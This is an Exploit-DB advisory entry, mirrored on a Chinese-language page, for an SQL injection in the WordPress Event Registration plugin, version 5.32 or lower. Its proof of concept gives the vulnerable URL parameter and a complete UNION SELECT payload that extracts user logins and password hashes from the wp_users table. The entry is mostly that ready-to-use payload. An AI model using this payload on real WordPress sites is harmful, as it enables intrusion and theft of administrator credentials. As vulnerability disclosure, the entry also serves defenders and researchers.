WordPress Plugin Event Registration 5.32 – SQL Injection

  • 作者: k3m4n9i
    日期: 2010-11-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15513/
  • [ WordPress Event Registration SQL injection ]
    # Author: k3m4n9i
    # Homepage: http://alko.web.id/
    # Date: 13 November, 2010
    
    [ Software Information ]
    [+] Vendor : http://edgetechweb.com/
    [+] Software Link: http://wordpress.org/extend/plugins/event-registration/
    [+] Version: 5.32 or lower
    
    [ Proof of Concept ]
    
    [-] Vulnerable File
    http://server/events/?regevent_action=register&event_id=[gotcha]
    
    [-] Xpl
    %20union%20select%201,group_concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20wp_users--